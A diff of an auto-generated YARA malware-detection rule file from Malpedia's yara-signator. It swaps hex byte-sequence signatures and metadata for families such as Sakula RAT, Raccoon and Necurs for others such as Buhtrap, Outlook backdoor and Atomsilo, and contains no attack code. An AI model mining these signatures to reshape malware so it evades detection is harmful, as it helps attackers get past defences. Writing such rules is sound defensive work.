-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sakula_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sakula_rat_auto.yar#L1-L230"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buhtrap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.buhtrap_auto.yar#L1-L161"
 		license_url = "N/A"
-		logic_hash = "19fb36915bb248bef0dadfadf28e10045720b8ee2d6f5e400ec2d27910f47a25"
+		logic_hash = "93883b1f6de8bbb29347fc147d93effe74e75beef64981374094d11349e65af7"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -96371,45 +96527,37 @@ rule MALPEDIA_Win_Sakula_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6800010000 6a00 6a00 68???????? }
-		$sequence_1 = { 33c9 85f6 7e15 8a0411 84c0 7409 }
-		$sequence_2 = { 742d 46 83fe03 7cd6 a1???????? 40 }
-		$sequence_3 = { b803000000 eb1b e8???????? 83f801 }
-		$sequence_4 = { e8???????? 83c404 5b 85c0 5f a3???????? 0f95c0 }
-		$sequence_5 = { 7e0b 803c385c 7405 48 85c0 7ff5 3bc1 }
-		$sequence_6 = { c3 53 e8???????? 69f6a4010000 0335???????? 8bde }
-		$sequence_7 = { 6800100000 6800940100 6a00 ff15???????? 8bf0 85f6 }
-		$sequence_8 = { ff75f4 ff75fc e8???????? 83c408 68???????? ff75fc }
-		$sequence_9 = { 48895c2408 4889742418 57 4883ec40 ffca }
-		$sequence_10 = { ff75e8 ff75e4 e8???????? 8d45dc }
-		$sequence_11 = { ff15???????? 488364243800 488364243000 4c8bc6 33d2 }
-		$sequence_12 = { ff7508 e8???????? 83c408 31c0 40 50 }
-		$sequence_13 = { 488b4c2450 8d5340 ff15???????? 488b4c2458 8d53f1 }
-		$sequence_14 = { 448d4260 e8???????? 33db 33c0 488d4de2 33d2 41b8ce070000 }
-		$sequence_15 = { 0fbe02 83f85a 7f24 8b4d08 034df8 }
-		$sequence_16 = { ff15???????? 488d15a4100000 488d0d05210000 ff15???????? 488d1d08230000 }
-		$sequence_17 = { 3bc6 741b 488b4dc7 488b01 ff90a8000000 3bc6 }
-		$sequence_18 = { 8b4508 0514010000 50 ff35???????? }
-		$sequence_19 = { 488d68a1 4881ecc0000000 488365c700 488d15e90f0000 488d0d021f0000 498bf0 }
-		$sequence_20 = { 8b4110 40 894304 8b410c }
-		$sequence_21 = { 8364245800 ff15???????? 488d542458 488bc8 ff15???????? 488b7008 488bce }
-		$sequence_22 = { 83fa00 7404 49 4a ebeb }
+		$sequence_0 = { e8???????? 59 59 84c0 0f8435010000 }
+		$sequence_1 = { 6aff 57 50 68e9fd0000 ff15???????? 8bf0 83fe01 }
+		$sequence_2 = { 8bec 83ec44 53 56 57 bf04010000 }
+		$sequence_3 = { 6a00 6a00 ab ab 8b45f8 50 }
+		$sequence_4 = { e8???????? 6a06 5a b9???????? 8945c4 e8???????? }
+		$sequence_5 = { e8???????? 803d????????00 7426 8b0d???????? 85c9 7406 }
+		$sequence_6 = { 746f 3b45f8 776a 6805010000 ff15???????? }
+		$sequence_7 = { 56 ff15???????? 83c414 84db 7541 }
+		$sequence_8 = { 85c0 742f 6a01 53 6a0c }
+		$sequence_9 = { 7429 8b7b20 6a00 8d7308 e8???????? 59 }
+		$sequence_10 = { e8???????? 8b5dec 83c410 eb57 8d45f0 }
+		$sequence_11 = { 83e800 57 745b 48 7567 }
+		$sequence_12 = { ff75f8 ffd7 85c0 754c 8b45fc }
+		$sequence_13 = { 83c40c 85c0 7452 b8ff000000 e8???????? 880437 }
+		$sequence_14 = { 59 84c0 0f84a3000000 6a10 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Cloudburst_Auto : FILE
+rule MALPEDIA_Win_Pngdowner_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b338a4c1-8ad1-5066-b3d2-7c247a054c09"
+		id = "44303c5d-967e-534a-8e83-5300065e2ae0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudburst"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cloudburst_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pngdowner_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "68d67b600a1326ab834c6a6b6204bba9f511b6494e369c94d17eaf52125b8157"
+		logic_hash = "de22eb663da7ff55693bb983ea5d4c7de5d0a56ea6d44ddf300552a98f59e1cb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96423,32 +96571,32 @@ rule MALPEDIA_Win_Cloudburst_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b4508 498bcd 4889442428 e8???????? b904000000 }
-		$sequence_1 = { 45894c2424 418bf9 4133f8 4433df 41897c2428 45895c242c 418bc3 }
-		$sequence_2 = { 7205 80f97a 7614 80f941 }
-		$sequence_3 = { 33d6 41891424 4133d3 33fa 4189542404 33df }
-		$sequence_4 = { 743e 488b0d???????? 4c8d4c2448 488bd7 ff15???????? }
-		$sequence_5 = { 448bc3 4533c2 4133e8 45894424f8 41896c24fc 8bc5 c1e810 }
-		$sequence_6 = { 80f97a 7614 80f941 7205 80f95a 760a 80f930 }
-		$sequence_7 = { 0430 4388441802 83c303 4983c003 41ffc1 }
-		$sequence_8 = { 43895403fa 4183f904 7cc0 418b8700020000 48895c2438 }
-		$sequence_9 = { 8bc6 c1ee10 c1e808 c1e208 }
+		$sequence_0 = { aa 8d9ec8dc4000 803b00 8bcb }
+		$sequence_1 = { 83c404 83c8ff 5f 5e 5d 5b 81c45c010000 }
+		$sequence_2 = { 51 ff15???????? 8bf8 83ffff 751a }
+		$sequence_3 = { 6a00 51 8d542438 50 52 }
+		$sequence_4 = { 7419 0fb6da f68301e5400004 7406 }
+		$sequence_5 = { f3a4 8b442410 8b4c2414 43 3bd9 0f82eefeffff 50 }
+		$sequence_6 = { 83e01f c1f905 8d04c0 be00800000 8b0c8d40e64000 8d548104 8a4c8104 }
+		$sequence_7 = { 85c0 7556 b920000000 8dbc2498010000 f3ab b920000000 }
+		$sequence_8 = { 83e00f 45 8a4c840c 884c2eff c6042e3d c6442e0100 5e }
+		$sequence_9 = { 83651003 8bf0 750b c1e602 8b8640dc4000 }
 
 	condition:
-		7 of them and filesize < 2363392
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Fancyfilter_Auto : FILE
+rule MALPEDIA_Win_Broler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0361fd07-d305-5b73-bb16-8f25d1edd877"
+		id = "e5ddbcf2-267f-50c4-9a07-ee97c0a66c40"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fancyfilter"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fancyfilter_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.broler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.broler_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "476e24d851dbd343335f49ac83fe24b993db2eb5e282eab0e77caa734f27e50a"
+		logic_hash = "a1c6e2e8a7e6cd7262212833aaeef2ea07ebc3af38a6241bbd7582277c8df1b7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96462,32 +96610,32 @@ rule MALPEDIA_Win_Fancyfilter_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 740a 66833800 7404 b001 eb02 }
-		$sequence_1 = { 891d???????? 891d???????? b001 5b }
-		$sequence_2 = { 740a 66833800 7404 b001 eb02 }
-		$sequence_3 = { 750d 8b472c a801 7406 }
-		$sequence_4 = { a1???????? 83c012 50 ff15???????? a1???????? }
-		$sequence_5 = { 8d4f20 51 50 ff15???????? }
-		$sequence_6 = { 85c0 740a 66833800 7404 b001 eb02 32c0 }
-		$sequence_7 = { 8b07 83e810 50 83c610 }
-		$sequence_8 = { 85c0 750d 8b472c a801 }
-		$sequence_9 = { 85c0 750d 8b472c a801 7406 }
+		$sequence_0 = { ff15???????? 50 ff15???????? 3bc3 7408 8d4dc8 51 }
+		$sequence_1 = { 885dd4 720c 8b55b8 52 e8???????? 83c404 837d1c10 }
+		$sequence_2 = { 84c9 75f9 2bc2 8bf8 8bc3 8d75d4 }
+		$sequence_3 = { 894508 c1f818 8bdf c1fb18 81e3ff000000 3283085b4100 8b5d0c }
+		$sequence_4 = { 8bf8 ff15???????? 85ff 7508 57 53 ff15???????? }
+		$sequence_5 = { 8bcc 895910 c741140f000000 8d5508 89a51cdffcff }
+		$sequence_6 = { 50 83c8ff 33db e8???????? 8d8d8cfeffff e8???????? 83c440 }
+		$sequence_7 = { 85c0 0f8489000000 33d2 f7b6cc030000 85d2 0f8579000000 }
+		$sequence_8 = { c60100 e8???????? 8dbd8cfeffff e8???????? 83c41c 8bf8 8db554feffff }
+		$sequence_9 = { 03d8 3bd9 7624 83fa10 7204 8b06 }
 
 	condition:
-		7 of them and filesize < 169984
+		7 of them and filesize < 275456
 }
-rule MALPEDIA_Win_Jackpos_Auto : FILE
+rule MALPEDIA_Win_Outlook_Backdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3dd7bb50-a9ba-5035-bc39-1825f87f4af4"
+		id = "02559762-15b6-5207-804c-a16ddeee8406"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jackpos_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.outlook_backdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.outlook_backdoor_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "e318334295704491926f566878a765af2b4635b235cabb0b05edeaa2585792fc"
+		logic_hash = "3a281d78de1c71eb339e38944e06a51b382bc71a750ef84181f02e7a83ac1311"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96501,32 +96649,32 @@ rule MALPEDIA_Win_Jackpos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 03f3 50 8d0472 eb6a 83f808 7204 }
-		$sequence_1 = { 8b07 85c0 7454 8b5934 8b7120 8b1b 8b36 }
-		$sequence_2 = { 8b4dd4 8bc1 83fa08 7303 8d45d4 8d1c78 85db }
-		$sequence_3 = { 895df0 3bf3 0f849c000000 391e 0f8594000000 6a10 e8???????? }
-		$sequence_4 = { 2bf8 6a00 57 bb01000000 8d75d4 e8???????? 8b45b4 }
-		$sequence_5 = { 1bc0 83e0fe 83c001 7511 3bf7 }
-		$sequence_6 = { 52 8b55bc 57 8d4dac 51 0fb7c0 52 }
-		$sequence_7 = { 897df0 3bfe 762a 8da42400000000 8b450c 50 }
-		$sequence_8 = { 52 8d4584 50 eb3e 837d9000 }
-		$sequence_9 = { 3b7d10 747e 83c704 83f808 7204 8b0f }
+		$sequence_0 = { 8b450c 83650c00 53 56 0fb730 57 6685f6 }
+		$sequence_1 = { 8bf9 33f6 8bda 3bfe 740c 57 e8???????? }
+		$sequence_2 = { e8???????? 8b450c 8945f0 3bc3 7473 eb03 }
+		$sequence_3 = { 51 ff7608 8945f0 8d8528ffffff 50 e8???????? 59 }
+		$sequence_4 = { e8???????? 51 56 8b7508 8365fc00 e8???????? }
+		$sequence_5 = { 59 8b450c 8b5508 57 ff75f0 8bcb e8???????? }
+		$sequence_6 = { eb02 33c0 8bf0 ff75f0 ff15???????? 5f 8bc6 }
+		$sequence_7 = { 81c338070000 e8???????? 33ff 57 6a01 8d7500 }
+		$sequence_8 = { 03ce 034d08 2bc6 2b4514 }
+		$sequence_9 = { 57 8b7d10 8945e8 8b4518 895de0 897de4 8945ec }
 
 	condition:
-		7 of them and filesize < 319488
+		7 of them and filesize < 2912256
 }
-rule MALPEDIA_Win_Chewbacca_Auto : FILE
+rule MALPEDIA_Win_Bookcodesrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "390231b1-3e2b-54db-9803-32024f965f10"
+		id = "99ba8457-466c-5891-8a8f-fdeb5f482f06"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chewbacca"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.chewbacca_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bookcodesrat_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "e7a38996a98134785fc7654ab24d9b2f764c6a77f5e2b53f68cf035bd47e7345"
+		logic_hash = "97a726b41418f1d2b06b45e6dc5e4910d38bdcc7f5f296e48cad978114a25824"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96540,32 +96688,32 @@ rule MALPEDIA_Win_Chewbacca_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744240cf2020000 89442408 c7442404???????? a1???????? 83c040 890424 e8???????? }
-		$sequence_1 = { e8???????? e8???????? 83b83003000000 7505 bb???????? 89d8 83c428 }
-		$sequence_2 = { c7442408???????? c744240400080000 c7042406000000 e8???????? 8b442454 890424 e8???????? }
-		$sequence_3 = { c744240400100000 c7042403000000 e8???????? c70424???????? e8???????? c7442414003b6800 c7442410ee3d6800 }
-		$sequence_4 = { c7442408???????? c744240400100000 c7042403000000 e8???????? c70424???????? e8???????? c74424140c136800 }
-		$sequence_5 = { ff8bc0000000 837c243800 7410 39f3 740c 895c2404 892c24 }
-		$sequence_6 = { a1???????? ffd2 eb05 b8???????? 8918 e8???????? 5b }
-		$sequence_7 = { ff5270 85d2 7f0d 0f8c7b000000 3d00000100 7274 8d954cffffff }
-		$sequence_8 = { e8???????? b801000000 8d5598 8d4db4 e8???????? e8???????? 50 }
-		$sequence_9 = { e8???????? 8b4308 8b10 8b4004 f7d0 f7da 83d8ff }
+		$sequence_0 = { ff15???????? 4883bba036000000 48898318360000 0f847f040000 4883bba836000000 0f8471040000 4883bb1036000000 }
+		$sequence_1 = { 4c8b442460 ba01000000 498bcc ffd3 488bc3 4883c440 415d }
+		$sequence_2 = { e8???????? 488d7b58 be06000000 488d05f5300200 483947f0 7412 488b0f }
+		$sequence_3 = { 498bcd e8???????? 48ffc3 e9???????? 498bcd e8???????? 48ffc3 }
+		$sequence_4 = { 488bf0 ff9360370000 488d8d78040000 4c8be0 ff9360370000 488d8d48050000 4c8bf8 }
+		$sequence_5 = { 888548070000 48898549070000 48898551070000 888588060000 48898589060000 48898591060000 898599060000 }
+		$sequence_6 = { 488bcf 48898350370000 ff15???????? 488d9520040000 488bcf 48898358370000 }
+		$sequence_7 = { 8bc3 488b8c24d0020000 4833cc e8???????? 4881c4e0020000 }
+		$sequence_8 = { 4c897c2420 4c8d05e46dffff 0f1f4000 4885db 7504 }
+		$sequence_9 = { 48ffc6 4883c310 493bf4 b900000000 7c8e 4c8b6580 4c8b6c2478 }
 
 	condition:
-		7 of them and filesize < 9764864
+		7 of them and filesize < 544768
 }
-rule MALPEDIA_Win_Necurs_Auto : FILE
+rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6a74d2a0-5b63-50c2-96d3-f0fbeed1b3d4"
+		id = "f4c7e6b7-7f12-5acd-8436-2c3134e8001d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.necurs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.necurs_auto.yar#L1-L154"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptoshuffler_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "1a877e35a35cc5b42dec49f688cab91a0513382e31843c1efea0701ab2d894e0"
+		logic_hash = "4b559d81f694922613ae9b35eca370b9546b803a67169819f510f86751d1ed9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96579,37 +96727,32 @@ rule MALPEDIA_Win_Necurs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8bf2 ba06e0a636 f7e2 }
-		$sequence_1 = { f7f6 8bc2 034508 5e 5d c3 }
-		$sequence_2 = { ba06e0a636 f7e2 03c8 a1???????? 13f2 33d2 }
-		$sequence_3 = { 13f2 33d2 030d???????? a3???????? }
-		$sequence_4 = { 8bc8 a1???????? 56 8bf2 }
-		$sequence_5 = { 8935???????? 890d???????? 8bc1 5e c3 55 8bec }
-		$sequence_6 = { a1???????? 13f2 a3???????? 8935???????? }
-		$sequence_7 = { 8d85ecfbffff 57 50 e8???????? 83c410 }
-		$sequence_8 = { 33d7 33c1 52 50 e8???????? }
-		$sequence_9 = { 6a7b 50 ffd6 8bf8 59 59 }
-		$sequence_10 = { 7409 8bc1 8bd7 e9???????? }
-		$sequence_11 = { 53 ff15???????? 59 33c0 5e 5b }
-		$sequence_12 = { 6a7d 50 ffd6 59 59 85c0 }
-		$sequence_13 = { 33d2 5e 5f c9 }
-		$sequence_14 = { e9???????? 83caff 8bc2 e9???????? }
+		$sequence_0 = { 7777 8bd8 53 e8???????? 83c404 8b7de8 b8abaaaa2a }
+		$sequence_1 = { 833e00 7568 6a10 e8???????? 8bf8 83c404 897d08 }
+		$sequence_2 = { 7ed0 83c8ff eb07 8b04f5740f0210 5f 5e 5b }
+		$sequence_3 = { 8500 ebe7 53 8bdc 51 }
+		$sequence_4 = { e9???????? 8d4e10 51 50 }
+		$sequence_5 = { 8bf1 e8???????? 8bd0 0f57c0 83c404 8955fc }
+		$sequence_6 = { 8bc1 3914c5f84c0210 7408 40 }
+		$sequence_7 = { 57 e8???????? 83c404 8933 c6430400 8bc3 8b4df4 }
+		$sequence_8 = { e8???????? 85c0 0f8550feffff 5f 5e 5b 8b4c2428 }
+		$sequence_9 = { 0f82a5040000 8b4c2410 40 3d00100000 722a f6c11f 0f8562050000 }
 
 	condition:
-		7 of them and filesize < 475136
+		7 of them and filesize < 425984
 }
-rule MALPEDIA_Win_Cargobay_Auto : FILE
+rule MALPEDIA_Win_Industrial_Spy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "19cc2286-1645-5f7d-a2c4-3ef65d16d1bb"
+		id = "7da79c63-fa14-572c-88ac-b76f6cdc6221"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cargobay_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.industrial_spy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.industrial_spy_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "2ae360967276d2625b03685b127c94c75664c2e3f32ade543c32daba4148b1b4"
+		logic_hash = "7a3233469624bdad85e090a4dc1c96ea6796ab995a15b629b5d495e015c5b4df"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96623,32 +96766,32 @@ rule MALPEDIA_Win_Cargobay_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb28 8b05???????? f7d0 488d4c2430 488d942440030000 a900004010 7507 }
-		$sequence_1 = { eb1c 4c8d058c761100 41b905000000 4889f9 4889da e8???????? b102 }
-		$sequence_2 = { 4d31e8 4831eb 49c1c120 49c1c420 49c1c020 4c89442428 48c1c320 }
-		$sequence_3 = { e8???????? 4c8d05e9c90d00 488d7c2440 4889f9 4889f2 e8???????? 488b37 }
-		$sequence_4 = { e8???????? 488bbbd8100000 488b83e0100000 486bb3e810000018 4c8d3437 4889bb60050000 48898368050000 }
-		$sequence_5 = { e9???????? c1e70c 09c7 40f6c501 0f844c010000 66662e0f1f840000000000 81ff00001100 }
-		$sequence_6 = { 4901c0 4c89e1 4889c2 e8???????? 4d8b7c2410 408a7e40 0f104641 }
-		$sequence_7 = { e8???????? 803e00 0f84c9000000 488b442428 eba2 807b0800 0f84d1000000 }
-		$sequence_8 = { f04c0fb129 0f84ec010000 4989c6 488b4508 4885c0 0f84d9feffff f048ff08 }
-		$sequence_9 = { eb0c 488d542440 48c70205000000 4889f9 e8???????? e9???????? 4c8d05fb400e00 }
+		$sequence_0 = { 4881ec50020000 8b9c2480020000 498bf1 488bf9 448bcb }
+		$sequence_1 = { 48896c2410 4889742418 57 4883ec20 8b742450 488d7904 89b790010000 }
+		$sequence_2 = { 8bc5 448bc3 2bc3 488d5718 4803d0 498bce e8???????? }
+		$sequence_3 = { b80f000000 412bc1 41ffc1 8bd0 0fb64c05e7 0fb6441804 4403c0 }
+		$sequence_4 = { 488d1576800000 e8???????? 8bcb 4885c0 740c }
+		$sequence_5 = { e8???????? 85c0 7461 488d942468020000 488bcf e8???????? }
+		$sequence_6 = { e8???????? 4885c0 754c 488d942428020000 488bcf e8???????? 4885c0 }
+		$sequence_7 = { 4885c0 7509 488d056f710100 eb04 4883c024 4883c428 c3 }
+		$sequence_8 = { 8b742450 488d7904 89b790010000 4c8d9780010000 410fb601 498be8 c1e018 }
+		$sequence_9 = { 448bd2 418bc3 23c2 41f7d2 0bc8 034dc8 }
 
 	condition:
-		7 of them and filesize < 3432448
+		7 of them and filesize < 339968
 }
-rule MALPEDIA_Win_Raccoon_Auto : FILE
+rule MALPEDIA_Win_Atomsilo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1c26303-9125-5fd7-aa51-ad1eac6fcf97"
+		id = "3435600a-ea5a-5a3a-a6f8-26d97e3c0136"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.raccoon"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.raccoon_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.atomsilo_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "490a547d291c29560eb0a750de21265ccd9b82463cd0d04b08babd8cc5f3ca9a"
+		logic_hash = "e09362cc7b2f3a6215eeee28b5549da2887bc59c3f8b5fb41ad869fd5e8818fd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96662,19 +96805,19 @@ rule MALPEDIA_Win_Raccoon_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 59 85c0 7505 8a07 8806 46 }
-		$sequence_1 = { 85ff 7464 833e00 53 }
-		$sequence_2 = { 7437 837b1410 7202 8b1b 837f1410 7202 8b3f }
-		$sequence_3 = { 897dec 3b7de4 75bf 83f9fa 7e1e 83c108 c1e308 }
-		$sequence_4 = { 8bf0 59 85f6 742d 8d4514 50 }
-		$sequence_5 = { 57 8b7d0c 8955f8 894df4 85ff 7403 832700 }
-		$sequence_6 = { 03ce e8???????? 8d4dd4 e8???????? 8b4df4 8bc6 }
-		$sequence_7 = { e8???????? 89450c 85c0 0f8486000000 53 8b1d???????? 68???????? }
-		$sequence_8 = { 56 57 ff15???????? 8b35???????? 57 ffd6 ff75e8 }
-		$sequence_9 = { 8bcf e8???????? 59 59 8d7301 56 ff15???????? }
+		$sequence_0 = { 4863c9 488d1506760900 33440a02 8b4c2438 ffc1 8bc9 488b542430 }
+		$sequence_1 = { 488bca e8???????? 90 0fbae60c 7336 0fbaf60c 89b500010000 }
+		$sequence_2 = { 0f84c7010000 498b4020 0fb600 2401 0f84b8010000 488d04bd00000000 488985e0000000 }
+		$sequence_3 = { 488b9308010000 4885d2 7415 488bfa 33c0 488b0c19 f348ab }
+		$sequence_4 = { 90 488bd0 488d4e60 e8???????? 90 488b4d60 48394d58 }
+		$sequence_5 = { 4053 4883ec30 488d0dc7340800 c705????????01000000 ff15???????? 488bd8 48331d???????? }
+		$sequence_6 = { 0f44ca 418bc4 8bd1 2bc1 83f801 77de 412bec }
+		$sequence_7 = { 4889442438 488bd8 4885c0 7443 488d05a57b0300 be04000000 488903 }
+		$sequence_8 = { e8???????? 418bd4 84c0 0f94c2 488d4def e8???????? 90 }
+		$sequence_9 = { 48895608 488b5c2470 4883c430 415f 415e 415c 5f }
 
 	condition:
-		7 of them and filesize < 1212416
+		7 of them and filesize < 1785856
 }
 rule MALPEDIA_Win_Poslurp_Auto : FILE
 {
@@ -96715,18 +96858,18 @@ rule MALPEDIA_Win_Poslurp_Auto : FILE
 	condition:
 		7 of them and filesize < 50176
 }
-rule MALPEDIA_Win_Thanatos_Auto : FILE
+rule MALPEDIA_Win_Synflooder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a5721dfd-b447-5b95-8938-1157e68dfcc1"
+		id = "a5f633b9-dcb2-5076-bf0d-bd81d1f23849"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.thanatos_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.synflooder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.synflooder_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "53b5f2fa82e8c7501726e7b2943f1eca40b261bf73b7a493f709f61c94b8f1bb"
+		logic_hash = "f7c8ec3c0f9f10642bd0b77ad1f3921e90b05a4859f114057bd9d1a11d0bddfc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96740,32 +96883,32 @@ rule MALPEDIA_Win_Thanatos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668945f8 a0???????? 8845fa 8d45f4 50 ff15???????? }
-		$sequence_1 = { 8d45f0 50 ff15???????? 8bf0 ba3c9a4d59 }
-		$sequence_2 = { 50 ff15???????? 8d45c8 8945e4 8d45e0 }
-		$sequence_3 = { 53 8d85e4fdffff 50 e8???????? 83f801 b9???????? }
-		$sequence_4 = { 884304 8d0c37 2bf1 8d43fb 03c6 8944241d c644241ce9 }
-		$sequence_5 = { 83c108 8b45fc 5f ba40000000 5e }
-		$sequence_6 = { 8985f0dfffff 3bc3 0f8541010000 85f6 }
-		$sequence_7 = { 8d45bd 6a00 50 c645bc00 e8???????? 83c418 e8???????? }
-		$sequence_8 = { b906000000 eb05 b907000000 8b55fc 668b044dc84f0210 8b4d10 52 }
-		$sequence_9 = { 50 c745f45c400110 e8???????? cc 55 8bec }
+		$sequence_0 = { e8???????? 83c404 eb17 bb00040000 c744241800280000 be3c000000 b8e8030000 }
+		$sequence_1 = { c7465c20b04000 83660800 33ff 47 897e14 897e70 }
+		$sequence_2 = { 50 e8???????? 46 83c404 89742410 3b74241c }
+		$sequence_3 = { 807e0a00 750b 56 e8???????? 59 85c0 7407 }
+		$sequence_4 = { ff15???????? 8b742420 56 68???????? }
+		$sequence_5 = { 33f6 85db 7e1b 8bff e8???????? 0fbec0 99 }
+		$sequence_6 = { c3 8bff 55 8bec 8b4508 33c9 3b04cdd0e24000 }
+		$sequence_7 = { 46 83c404 89742410 3b74241c 7539 6a64 }
+		$sequence_8 = { 0fb60b 40 80b910ee400000 74e8 8a13 0fb6ca 0fbe8910ee4000 }
+		$sequence_9 = { 7432 8d7304 66837efc01 751d }
 
 	condition:
-		7 of them and filesize < 1810432
+		7 of them and filesize < 163840
 }
